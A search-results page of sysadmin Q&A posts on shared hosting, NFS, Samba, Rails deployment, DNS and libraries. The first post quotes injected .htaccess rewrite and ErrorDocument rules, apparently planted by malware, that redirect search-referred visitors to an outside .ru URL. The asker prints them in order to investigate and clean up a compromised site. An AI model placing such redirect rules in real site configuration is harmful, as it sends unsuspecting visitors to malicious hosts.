Search Results

Search found 7554 results on 303 pages for 'shared secret'.


  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting account of one of my clients. The issue is as follows: every two hours or so, the main .htaccess file and all the other .htaccess files get modified. At the top of each file these lines are added:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
    RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
    </IfModule>

    and at the bottom:

    ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
    ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
    ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
    ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
    ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

    The main problem is that I'm not root on the server and cannot sudo, since this is shared hosting with hundreds of websites. The usual useful commands such as dmesg, lsof, dtrace, chattr and many others are not available to me because I'm not root. I can't find out who is modifying the .htaccess files; how do I get that information? My guess is that some PHP script, called from outside via command and control, is making the change. This seems related to: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying the .htaccess files without being root? (A monitoring sketch follows this entry.)

    Read the article
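    One way to catch the culprit without root is to watch the .htaccess files yourself and record what is running at the moment they change. Below is a minimal polling sketch, not taken from the post: it assumes Ruby is available on the shared host, that the account's web root is ~/public_html, and that ps can list your own processes.

      #!/usr/bin/env ruby
      # Poll every .htaccess under the web root and, whenever one changes,
      # log a snapshot of this account's processes. A rogue PHP or cron job
      # will often show up in that snapshot. Sketch only: WEB_ROOT and the
      # 10-second interval are assumptions, not details from the post.
      require 'time'

      WEB_ROOT = File.expand_path('~/public_html')
      LOG_FILE = File.expand_path('~/htaccess_watch.log')

      mtimes = {}
      Dir.glob(File.join(WEB_ROOT, '**', '.htaccess')).each do |path|
        mtimes[path] = File.mtime(path)
      end

      loop do
        Dir.glob(File.join(WEB_ROOT, '**', '.htaccess')).each do |path|
          begin
            current = File.mtime(path)
          rescue Errno::ENOENT
            next
          end
          next if mtimes[path] == current
          mtimes[path] = current
          File.open(LOG_FILE, 'a') do |log|
            log.puts "#{Time.now.iso8601} CHANGED #{path}"
            # Process snapshot at the moment of the change.
            log.puts `ps -u #{ENV['USER']} -o pid,lstart,args`
            log.puts '-' * 60
          end
        end
        sleep 10
      end

    Left running in a nohup or screen session, the log at least narrows each change down to a time window and, with luck, to the process that made it.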

  • NFS-shared file-system is locking up

    - by fredden
    Our NFS-shared file-system is locking up. Please feel free to ask any questions you feel are relevant. :) When it happens, a lot of processes are in "disk sleep" state and the load averages on our machines sky-rocket. The machines are responsive over SSH, but the majority of our websites (apache + mod_php) just hang, as does our email system (exim + dovecot). Websites which don't require write access to the file-system continue to operate. The load averages continue to rise until some kind of time-out is reached, which takes at least 10-15 minutes. I've seen load averages over 800, yet the machines are still responsive for actions which don't require writing to the shared file-system. I've been investigating a variety of options, which have all turned out to be red herrings: nagios, proftpd, bind, cron tasks. I'm seeing these messages in the file server's system log:

    Jul 30 09:37:17 fs0 kernel: [1810036.560046] statd: server localhost not responding, timed out
    Jul 30 09:37:17 fs0 kernel: [1810036.560053] nsm_mon_unmon: rpc failed, status=-5
    Jul 30 09:37:17 fs0 kernel: [1810036.560064] lockd: cannot monitor node2
    Jul 30 09:38:22 fs0 kernel: [1810101.384027] statd: server localhost not responding, timed out
    Jul 30 09:38:22 fs0 kernel: [1810101.384033] nsm_mon_unmon: rpc failed, status=-5
    Jul 30 09:38:22 fs0 kernel: [1810101.384044] lockd: cannot monitor node0

    Software involved: VMware, Debian lenny (64-bit), ancient Red Hat (32-bit, version 7 I believe), Debian etch (32-bit), NFS, apache2 + mod_php, exim, dovecot, bind, amanda, proftpd, nagios, cacti, drbd, heartbeat, keepalived, LVS, cron, ssmtp, NIS, svn, puppet, memcache, mysql, postgres, Joomla!, Magento, Typo3, Midgard, Symfony, custom PHP apps. (A small diagnostic sketch follows this entry.)

    Read the article
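    A small diagnostic sketch (an assumption about the setup: the affected nodes are Linux with /proc mounted) that lists the processes currently stuck in uninterruptible sleep ("D", i.e. "disk sleep"). During an NFS lock-up these are typically the hung Apache and Exim workers, and their names hint at which mount they are blocked on.

      #!/usr/bin/env ruby
      # List processes in uninterruptible sleep ("D" state / "disk sleep").
      # Sketch only; reads the Linux /proc filesystem directly.

      Dir.glob('/proc/[0-9]*/status').each do |status_file|
        begin
          fields = {}
          File.foreach(status_file) do |line|
            key, value = line.split(':', 2)
            fields[key] = value.to_s.strip
          end
          next unless fields['State'].to_s.start_with?('D')
          puts format('%-8s %-20s %s', fields['Pid'], fields['Name'], fields['State'])
        rescue Errno::ENOENT, Errno::EACCES
          next # process exited or is unreadable; skip it
        end
      end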

  • Restoring a fresh home folder in a shared user domain environment

    - by Cocoabean
    I am using a tool called pGINA that adds another credential provider to my Windows 7 clients so we can authenticate campus users via the campus LDAP. We have the default Windows credential providers set up to authenticate against our Active Directory, but we have students in our classes who don't have entries in our AD, and we need to know who they are in order to allow them Internet access. Once these LDAP users log in via pGINA, they are all redirected to the same AD account, a "kiosk" account with GPOs in place to prevent anything malicious. My concern is that users will accidentally save personal login information or files in that shared profile, and another user may log in later and have access to a previous user's Gmail account, as the AppData folder on each computer is shared by everyone logging in as the kiosk user. I've looked into MS's "roll-your-own" SteadyState, but it didn't seem to have what I wanted. I tried to write a PowerShell script to copy a pre-saved clean version of the profile from a network share, but I kept running into issues with CredSSP delegation and accessing the share via the UNC path. Others have recommended something like DeepFreeze, but I'd like to do it without third-party tools if possible.

    Read the article

  • UNC shared path not accessible though necessary permissions are set

    - by Vysakh
    I have two environments, A and B. A is the original environment and B is a clone of A, identical except for the AD servers. B's AD server has been given a trust relationship with A, so that all the service and user accounts from A can be used in B too, and the trust works fine. But I encounter problems accessing UNC paths (\\server2\shared) with these service accounts. I checked environment A, and every permission set there is also set in B (already in place, since it is a clone of A), but the issue occurs only in environment B. FYI, the user is an owner of that folder in both environments. I tried creating a folder inside the share (\\server2\shared) from the command prompt, but it failed with "access denied". As a workaround, I added that user on the "Security" tab of the folder's permissions, and after that it worked fine. But this was not done in the original environment. Is this somehow related to the trust relationship? Why does the share to the same location, for the same user, behave differently in the two environments even though they have the same permissions? FYI, these are Windows 2003 servers. Can someone please help?

    Read the article

  • Why does adding a router hide all my shared folders?

    - by user1285419
    I have several computers running Windows XP installed in my office; they all connect to the WAN provided by the building (wall socket, DHCP, mask 255.255.252.0). I set up a shared folder on my computer so all the other computers in the same workgroup could access it. This configuration has been in use for a long time. Recently I have been trying to set up a router. I have the router's WAN port going to the wall socket and the NIC connected to one of the router's LAN ports, with the router in DHCP mode (192.168.0.100/255.255.255.0 to 192.168.0.110/255.255.255.0). I turned off all the firewalls (the Windows one and the router's built-in one), and the NIC is set to DHCP. If I run ipconfig /all, I see that the NIC was assigned the IP 192.168.0.100. I can access the Internet, email and so on. However, the shared folder can no longer be accessed by the other computers in the workgroup. I think it is an IP problem. What's really weird is that if I turn off the DHCP function in the router, ipconfig /all always gives 0.0.0.0/255.255.255.255 and I cannot access the Internet. I have no idea what's going on. Does anyone know how to fix this so the shared folder still works with the router in place? Thanks.

    Read the article

  • Ruby (Rack) application could not be started - Passenger (3.0.9) error for Rails 3.1.0 app on Ubuntu and nginx (1.0.6) after deploying

    - by user938363
    Here is the error saying bcrypt could not be loaded. The Rails app does not use Devise for authentication, and the bcrypt gem is not in the Gemfile. Sometimes the web server instead throws an error saying the spawn server cannot start. gem list shows that both bcrypt-ruby 3.0.1 and 3.0.0 are installed. (A possible fix is sketched after this entry.)

    Ruby (Rack) application could not be started
    A source file that the application requires, is missing.
    * It is possible that you didn't upload your application files correctly. Please check whether all your application files are uploaded.
    * A required library may not be installed. Please install all libraries that this application requires.
    Further information about the error may have been written to the application's log file. Please check it in order to analyse the problem.
    Error message: no such file to load -- bcrypt
    Exception class: LoadError
    Application root: /vol/www/emclab/current

    Backtrace (frame, file, line, location):
    0  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb  240  in `require'
    1  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb  240  in `block in require'
    2  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb  225  in `load_dependency'
    3  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb  240  in `require'
    4  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activemodel-3.1.0/lib/active_model/secure_password.rb  1  in `'
    5  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb  2160  in `block in '
    6  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb  2140  in `class_eval'
    7  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb  2140  in `'
    8  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb  31  in `'
    9  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/session_store.rb  77  in `'
    10  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/session_store.rb  51  in `'
    11  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/session_store.rb  1  in `'
    12  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application/configuration.rb  123  in `session_store'
    13  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb  168  in `block in default_middleware_stack'
    14  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb  142  in `tap'
    15  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb  142  in `default_middleware_stack'
    16  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/engine.rb  445  in `app'
    17  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application/finisher.rb  37  in `block in '
    18  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb  25  in `instance_exec'
    19  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb  25  in `run'
    20  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb  50  in `block in run_initializers'
    21  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb  49  in `each'
    22  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb  49  in `run_initializers'
    23  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb  92  in `initialize!'
    24  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/railtie/configurable.rb  30  in `method_missing'
    25  /vol/www/emclab/releases/20111115184804/config/environment.rb  5  in `'
    26  config.ru  3  in `require'
    27  config.ru  3  in `block in '
    28  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/rack-1.3.2/lib/rack/builder.rb  51  in `instance_eval'
    29  /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/rack-1.3.2/lib/rack/builder.rb  51  in `initialize'
    30  config.ru  1  in `new'
    31  config.ru  1  in `'
    32  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb  222  in `eval'
    33  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb  222  in `load_rack_app'
    34  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb  156  in `block in initialize_server'
    35  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/utils.rb  572  in `report_app_init_status'
    36  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb  153  in `initialize_server'
    37  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb  204  in `start_synchronously'
    38  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb  180  in `start'
    39  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb  128  in `start'
    40  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb  253  in `block (2 levels) in spawn_rack_application'
    41  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server_collection.rb  132  in `lookup_or_add'
    42  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb  246  in `block in spawn_rack_application'
    43  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server_collection.rb  82  in `block in synchronize'
    44  prelude>  10:in `synchronize'
    45  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server_collection.rb  79  in `synchronize'
    46  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb  244  in `spawn_rack_application'
    47  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb  137  in `spawn_application'
    48  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb  275  in `handle_spawn_application'
    49  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb  357  in `server_main_loop'
    50  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb  206  in `start_synchronously'
    51  /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/helper-scripts/passenger-spawn-server  99  in `'

    cap deploy:check returns "You appear to have all necessary dependencies installed". Any thoughts about the problem? Thanks!

    Read the article
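    For what it's worth, the LoadError in frame 4 comes from active_model/secure_password.rb, which in Rails 3.1.0 does require 'bcrypt' as soon as ActiveRecord loads, even if the app never calls has_secure_password. A commonly suggested fix (an assumption about this deployment, not something confirmed in the post) is to declare the gem explicitly so it ends up in the shared/bundle directory that Passenger is actually using:

      # Gemfile -- hypothetical addition, not taken from the original post.
      # Rails 3.1.0 requires the bcrypt library at load time, so it has to be
      # present in the deployment bundle even when Devise/has_secure_password
      # is not used.
      gem 'bcrypt-ruby', '~> 3.0.0'

    After adding it, run bundle install on the server (so the native extension is compiled against the same Ruby 1.9.2-p290 that Passenger runs) and restart the app with touch tmp/restart.txt.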

  • HostGator hosting account and DNS servers

    - by fxuser
    I have a hosting package at HostGator for the domain example.com. I also got a VPS from Digital Ocean, set up the DNS details on the server there (an A record pointing to the DO server IP, with @ as the hostname), and also set the DNS servers in my domain's DNS settings, which are hosted at HostGator. Everything seems okay so far... It's been 3-4 hours, I think, since I made these changes, and when I browse to example.com I still get the files of the active hosting package instead of the files on the new server. Do I need to cancel the hosting package before I can make this work? (A quick DNS check sketch follows this entry.) EDIT: if I'm on the wrong site, please move the question to the correct one.

    Read the article
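    A quick way to see whether the delegation change has actually propagated is to compare what different resolvers return for the domain. A small sketch using Ruby's standard Resolv library (example.com is the placeholder from the post; 8.8.8.8 is just one well-known public resolver):

      #!/usr/bin/env ruby
      # Compare NS and A records as seen by the local resolver and by a
      # public resolver. If they still point at HostGator, the DNS change
      # has not propagated (or was not applied) yet. Sketch only.
      require 'resolv'

      DOMAIN = 'example.com'

      def report(label, nameserver = nil)
        resolver = nameserver ? Resolv::DNS.new(nameserver: [nameserver]) : Resolv::DNS.new
        ns = resolver.getresources(DOMAIN, Resolv::DNS::Resource::IN::NS).map { |r| r.name.to_s }
        a  = resolver.getresources(DOMAIN, Resolv::DNS::Resource::IN::A).map { |r| r.address.to_s }
        puts "#{label}: NS=#{ns.inspect} A=#{a.inspect}"
      ensure
        resolver.close if resolver
      end

      report('local resolver')
      report('google public dns', '8.8.8.8')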

  • Samba smb.conf read only and read/write accounts

    - by Pieter
    Below you can see my smb.conf. pieter is my admin user; read/write access to the shares works fine with that account. I also have a leecher account, added to the Samba users with smbpasswd -a leecher, which is set up so that this user only has read access to the shares. This works on MegaSam and on Thumbnails but not on my other drives; leecher gets no access at all to the other shares. (A permission-comparison sketch follows this entry.)

    [global]
    security = user

    [MegaSam]
    comment = MegaSam
    path = /media/MegaSam
    browsable = yes
    guest ok = no
    read list = leecher
    write list = pieter
    create mask = 0755

    [SilentBob]
    comment = SilentBob
    path = /media/SilentBob
    browsable = yes
    guest ok = no
    read list = leecher
    write list = pieter
    create mask = 0755

    [Thumbnails]
    comment = Thumbnails
    path = /media/Thumbnails
    browsable = yes
    guest ok = no
    read list = leecher
    write list = pieter
    create mask = 0755

    [Downloads]
    comment = Downloads
    path = /media/Downloads
    browsable = yes
    guest ok = no
    read list = leecher
    write list = pieter
    create mask = 0755

    Read the article
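    One thing worth ruling out (an assumption, not something the post confirms): with identical share stanzas, the difference is often in the Unix permissions on the underlying directories, since Samba still needs the leecher user to have read and execute rights on the path itself. A small sketch that prints them side by side:

      #!/usr/bin/env ruby
      # Compare the Unix permissions of the share roots. With identical
      # smb.conf stanzas, a share that denies "leecher" often differs at the
      # filesystem level (no read/execute for that user's group or "other").
      # Sketch only; the paths are the ones from the smb.conf above.
      require 'etc'

      %w[/media/MegaSam /media/SilentBob /media/Thumbnails /media/Downloads].each do |path|
        begin
          st = File.stat(path)
          owner = Etc.getpwuid(st.uid).name
          group = Etc.getgrgid(st.gid).name
          puts format('%-20s mode=%o owner=%s group=%s', path, st.mode & 0o7777, owner, group)
        rescue Errno::ENOENT
          puts "#{path}: does not exist"
        end
      end

    If the working and failing shares show different modes or owners, adjusting the failing paths (for example chmod o+rx, or adding leecher to the owning group) would be worth trying.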

  • Why do I need lib64 on my 32 bit machine?

    - by Tim
    I am trying to install Oracle on my 32-bit machine running Ubuntu 10.04, following an "install Oracle on Ubuntu" tutorial. At the very first step there is a requirement to manually install the libstdc++5 library. The author does two steps: download libstdc++5_3.3.6-17ubuntu1_amd64.deb from here, and download ia32-libs_2.7ubuntu6.1_amd64.deb from here. As you may have noticed, these two files have an "_amd64" suffix, which tells me the author is using a 64-bit AMD processor. The author copied these files to the /usr/lib64 and /usr/lib32 folders respectively and simply created libstdc++.so.5 soft links in both folders. Since I am running a 32-bit machine, I simply downloaded the two files without the "_amd64" suffix. Unexpectedly, I also found two lib folders in my /usr folder: /usr/lib64 and /usr/lib. So here is my problem: I do not understand which files I have to copy, and where: 1) Do I have to follow the same steps as the author, i.e. download the files with the "_amd64" suffix and place them in my /usr/lib64 and /usr/lib folders? 2) Or do I have to use the libraries without the "_amd64" suffix? And one more question: why do I have /usr/lib64 at all?

    Read the article

  • 1and1: Unable to host an external domain

    - by Django Reinhardt
    I'm sorry if this isn't the right place for this question, but I'm presently having difficulties with my hosting provider (1and1). Two weeks ago, two of my clients bought hosting from them on my recommendation, but as it turned out, 1and1 are having severe technical difficulties. Right now none of their hosting packages can accept ANY external domains: either you pay the cost of transferring your domain's registrar, or you use the ugly 1and1 domain name. Not what you'd expect from a hosting company of 1and1's reputation! They have been promising me for two weeks that they're going to fix the problem, but as you have probably guessed by now, that hasn't happened. I would like to know a) whether anyone else is in the same boat as me, and b) whether there are other comparably reputable hosting providers that I should consider moving to instead. Very disappointing! :( Note: this is for 1and1 in the UK; I imagine it isn't affecting users in other countries(?) Clarification: 1and1 are unable to accept ANY external domains. That means that even if you update the DNS details on your domain, their system cannot be updated to add your external domain to your account.

    Read the article

  • Are libc versions tied to kernel versions?

    - by mathematician1975
    After reading the answers to my previous question, I have come to the conclusion that what I was actually looking for is an answer to the following: does a particular version of the kernel require a particular version of libc to run properly? Basically my problem stems from building an application on my Ubuntu 12.04 machine and trying to run it on 8.04. I have since learned from this and other Stack Exchange sites that it is backward compatibility of libc that causes these problems. Therefore what I am, perhaps naively, trying to do is build the same version of libc that exists on my target and then link against that on my host when I build the application. Then, in an ideal world, when I copy the application to the target, having been linked against the "correct" libc, it should work (in my head at least). I have been totally unable to find a way to install an older libc on my system, and wondered if each version is tightly bound to a kernel version, hence the above question.

    Read the article

  • Nautilus bookmarks and smb shares work with non-root user but not with root

    - by Enrique
    I'm having a problem with Nautilus on Ubuntu 10.10. When I open Nautilus as a normal user, it shows my bookmarks, and the bookmarks that point to SMB Windows shares work fine. However, if I start Nautilus as root, it does not show the bookmarks, and if I try to browse an SMB share directly (by pressing Ctrl+L and entering an address like smb://[email protected]/backups/), it doesn't work and gives me an error saying it couldn't be found.

    Read the article

  • How do I encrypt but share a number of folders?

    - by d3vid
    I want to achieve the following functionality. Is it possible? Boot up the computer (possibly via WakeOnLan or WakeOnPlan). Either be automatically logged in, or log in via the login screen, or log in remotely. I change this behaviour occasionally, so full-disk encryption wouldn't work for me because it requires a password at boot (which would prevent the remote boot-up options and the automatic login option). I am only interested in encrypting data, not the entire hard drive. Once logged in, either a launcher/tray icon is available to launch the encryption app (preferred), or I run the encryption app from the Dash, and I am prompted to unlock the encrypted folder(s) individually. Unlocked folders are available to me and to the apps I am running (e.g. editors, SpiderOak). Ideally, folders that I share with bindfs could be locked/unlocked by other users too. A key point is that once I have unlocked an encrypted folder, I don't want to have to think about it again. I currently achieve this with TrueCrypt (except for the last part). Unfortunately TrueCrypt isn't well integrated with Ubuntu (licensing issues prevent Debian from including it in their repo, the interface isn't quite integrated with Unity, setting it as a startup app doesn't quite work, and sharing encrypted folders isn't really part of its design). Is there an alternative to TrueCrypt that is better integrated with the Ubuntu GUI and would suit this workflow?

    Read the article

  • Ubuntu boots into a maintenance shell?

    - by Andrew
    Any time I try to start my computer it goes to a screen titled "GNU GRUB version 1.99-12ubuntu5", where I can choose from 5 different options. If I try to just boot Ubuntu with Linux 3.0.0-20-generic, it then goes to a screen saying:

    mountall: /lib/x86_64-linux-gnu/libc.so.6: version 'GLIBC_2.14' not found (required by /lib/libply.so.2)
    General error mounting filesystems.
    A maintenance shell will now be started.
    CONTROL-D will terminate this shell and reboot the system.
    root@Brown126:~#

    Control-D just brings me back to the first screen, and nothing works in recovery mode. How can I fix this?

    Read the article

  • please help me understand libraries/includes

    - by fiftyeight
    I'm trying to understand how libraries work. For example, I download a tarball and extract it. Now I run ./configure; from what I understand it searches pre-defined directories for certain library files. What does it do then? It creates a makefile, and the makefile contains the paths to these libraries? Then I run make, which compiles the source code and hard-codes the locations of the libraries? Am I correct? I do not really understand whether libraries are files with pre-defined paths or whether the OS somehow gives access to them through system calls. Another example: I compiled something on my computer, then moved it to a remote server. The executable needs the MySQL libraries to work; the server has MySQL, but for some reason when I execute the file it tells me "can't find libmysqlclient.so.16". Is there a solution for this? Is there a way to know where it tries to locate this file, or to give it another path? (A search sketch follows this entry.) I can't compile it on the server since it has no compiler, and I don't have root access to install packages. My last question: in the sequence "./configure", "make", "make install", is "make install" the only command that actually puts files outside the directory in which these files reside? If, for example, the software will be installed in /usr/local/, is "make install" the only command that will require "sudo" before it? Let me see if I got it correctly: "./configure" creates the Makefile according to the location of various files on your system, "make" compiles the source code according to this Makefile, and "make install" moves the files to their appropriate location. I know this has been very long; I thank anyone who had the patience to read my question :)

    Read the article
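    Regarding the "can't find libmysqlclient.so.16" part: the dynamic linker looks the library up at run time (it is not baked into the executable), and you can point it at another directory with LD_LIBRARY_PATH; running ldd ./your_program also lists which libraries it cannot resolve. The sketch below roughly imitates that search so you can see where, if anywhere, the library exists on the server. It is an approximation only (the real linker also consults the ld.so cache and any rpath in the binary), and "your_program" is a placeholder name.

      #!/usr/bin/env ruby
      # Where would the dynamic linker find libmysqlclient.so.16?
      # Rough approximation of the runtime search order: LD_LIBRARY_PATH,
      # directories listed under /etc/ld.so.conf.d, then the default lib dirs.
      LIB = 'libmysqlclient.so.16'

      dirs  = ENV.fetch('LD_LIBRARY_PATH', '').split(':').reject(&:empty?)
      dirs += Dir.glob('/etc/ld.so.conf.d/*.conf').flat_map do |conf|
        File.readlines(conf).map(&:strip).reject { |l| l.empty? || l.start_with?('#', 'include') }
      end
      dirs += %w[/lib /usr/lib /usr/local/lib /lib64 /usr/lib64]

      hits = dirs.uniq.select { |d| File.exist?(File.join(d, LIB)) }
      if hits.empty?
        puts "#{LIB} not found; set LD_LIBRARY_PATH to the directory that contains it, e.g."
        puts "  LD_LIBRARY_PATH=/path/to/libs ./your_program"
      else
        hits.each { |d| puts "found: #{File.join(d, LIB)}" }
      end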

  • Hosting several HTTP servers on single domain name

    - by Nakilon
    Several people have been given a single domain name, server.company.com, where they are now supposed to host their infrastructure or temporary projects, written in different ways and even in different programming languages. How do they divide the domain?

    1. Split into subdomains: john.server.company.com, kate.server.company.com, etc. This would need a lot of admin assistance and time; there would be no way for John and Kate to do it themselves.
    2. Split into URL namespaces: server.company.com/john/, server.company.com/kate/, etc. Pro: they can now put a single welcome page at the root with any additional information (if they need it?). Con: each server would need to know its namespace string constant, and hrefs like / would need patching.
    3. Split into ports: server.company.com:8080, server.company.com:8081, etc., and make a single welcome page on :80. Pro: they can still have a single welcome page at :80. Con: ???

    I would like to know more pros and cons for solutions 2 and 3. (A Rack-based sketch of option 2 follows this entry.)

    Read the article
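    For option 2, Rack-based apps can be mounted under path prefixes with Rack::URLMap; it adjusts SCRIPT_NAME/PATH_INFO for each app, which is what keeps links relative to the mount point working. A sketch (the app names are made up, and anything that is not a Rack app would need a reverse proxy instead):

      # config.ru -- a sketch of option 2 (URL namespaces) for Rack-based apps.
      require 'rack'

      john = lambda do |env|
        [200, { 'Content-Type' => 'text/plain' }, ["John's app, path=#{env['PATH_INFO']}"]]
      end

      kate = lambda do |env|
        [200, { 'Content-Type' => 'text/plain' }, ["Kate's app, path=#{env['PATH_INFO']}"]]
      end

      welcome = lambda do |env|
        [200, { 'Content-Type' => 'text/plain' }, ['Welcome page at the root']]
      end

      # URLMap dispatches on the longest matching prefix.
      run Rack::URLMap.new(
        '/'     => welcome,
        '/john' => john,
        '/kate' => kate
      )

    Run it with rackup config.ru; each person's app only sees paths below its own prefix.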

  • "Unable to mount location. Failed to mount Windows share" error when trying to share folders

    - by paulus_almighty
    I have two Ubuntu machines, both on 11.10, and I want to share folders from one to the other. On the server machine, in Nautilus, I right-click the folder and choose Properties > Share > Share this folder > Create Share. Then, on the client, I'm prompted for a username and password, but my username and password do not work. If I select the "Guest access" check box instead, I get "Unable to mount location. Failed to mount Windows share". This should be straightforward, right?

    Read the article

  • Port forward based on external IP (for VPS hosting)

    - by Ben Alter
    What I want to do is host a VPS. First, I'd like to set up a static IP address that forwards to my home IP address (so I can have more than one IP coming into my house). How can I do this without contacting my ISP, and is it even possible? I don't mind paying for something that does this. Once I have the extra external IP address, how can I forward it to my VPS? How is my router supposed to differentiate between two separate external IP addresses?

    Read the article

  • Find version of development library from command line?

    - by mathematician1975
    I installed the C++ Boost development libraries using the Ubuntu Software Centre. The problem is that it was quite a long time ago, and I cannot remember where they are installed or what version they were. Is there anything I can do from the command line that will tell me what version(s) I have installed on my system? I know I can do things like gcc -v to get the version of an application, but is there something similar for libraries? I am using Ubuntu 12.04. (A small sketch follows this entry.)

    Read the article
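    If the headers came from the Ubuntu package, dpkg -s libboost-dev (or dpkg -l 'libboost*') will show the packaged version. The version is also recorded in the headers themselves; a small sketch that reads it, assuming the default /usr/include/boost location used by the libboost-dev package:

      #!/usr/bin/env ruby
      # Read the installed Boost version straight from its headers.
      # Adjust the path if the headers were installed somewhere else.
      header = '/usr/include/boost/version.hpp'

      if File.exist?(header)
        if (line = File.readlines(header).find { |l| l.include?('BOOST_LIB_VERSION') })
          # The macro looks like: #define BOOST_LIB_VERSION "1_46_1"
          puts "Boost version: #{line[/"([^"]+)"/, 1].to_s.tr('_', '.')}"
        else
          puts 'version.hpp found, but no BOOST_LIB_VERSION line in it'
        end
      else
        puts "#{header} not found -- are the Boost development headers installed?"
      end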

  • How can I install an old version of libc on 12.04 and is it safe to do so?

    - by mathematician1975
    I am building an application on 12.04 and I need to run it on an embedded device. The device has libc-2.8.90.so on it and my dev machine has libc-2.15.so. I would like to install libc-2.8.90 onto my dev machine and attempt to link my application against it. I have searched the Ubuntu Software Centre for libc-2.8.90 but cannot find anything resembling it. Is there a way to install this on my machine from the command line? Also, will my system be safe with two versions of libc installed at the same time, or can that lead to instability?

    Read the article

  • phishing attack. Where do I start the cleanup?

    - by Suz
